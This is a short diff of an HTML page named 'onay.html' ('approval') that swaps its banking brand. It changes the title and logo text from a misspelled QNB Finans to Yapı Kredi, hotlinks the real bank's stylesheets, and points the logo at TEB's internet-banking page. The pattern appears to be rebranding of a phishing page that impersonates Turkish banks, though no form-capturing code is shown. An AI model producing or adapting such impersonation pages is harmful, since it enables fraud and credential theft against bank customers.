--- a/onay.html
+++ b/onay.html
@@ -3,9 +3,9 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>QBN FİNANS Bankası</title>
-    <link rel="stylesheet" href="https://www.qnb.com.tr///ngi-static/css/source/fonts.css">
-    <link rel="stylesheet" href="https://www.qnb.com.tr///ngi-static/css/main.ui.min.css">
+    <title>Yapı Kredi</title>
+    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/source/fonts.css">
+    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/main.ui.min.css">
     <link rel="stylesheet" href="main.css">
     <style>
         .responsive-image {
@@ -28,8 +28,8 @@
 <body>
     <div class="container">
         <div class="logo">
-            <a href="https://www.qnb.com.tr/" target="_blank">
-                <img src="./logo.png" alt="QBN FİNANS Logo">
+            <a href="https://www.teb.com.tr/sizin-icin/internet-subesi" target="_blank">
+                <img src="./logo.png" alt="Yapı Kredi Logo">
             </a>
         </div>
         
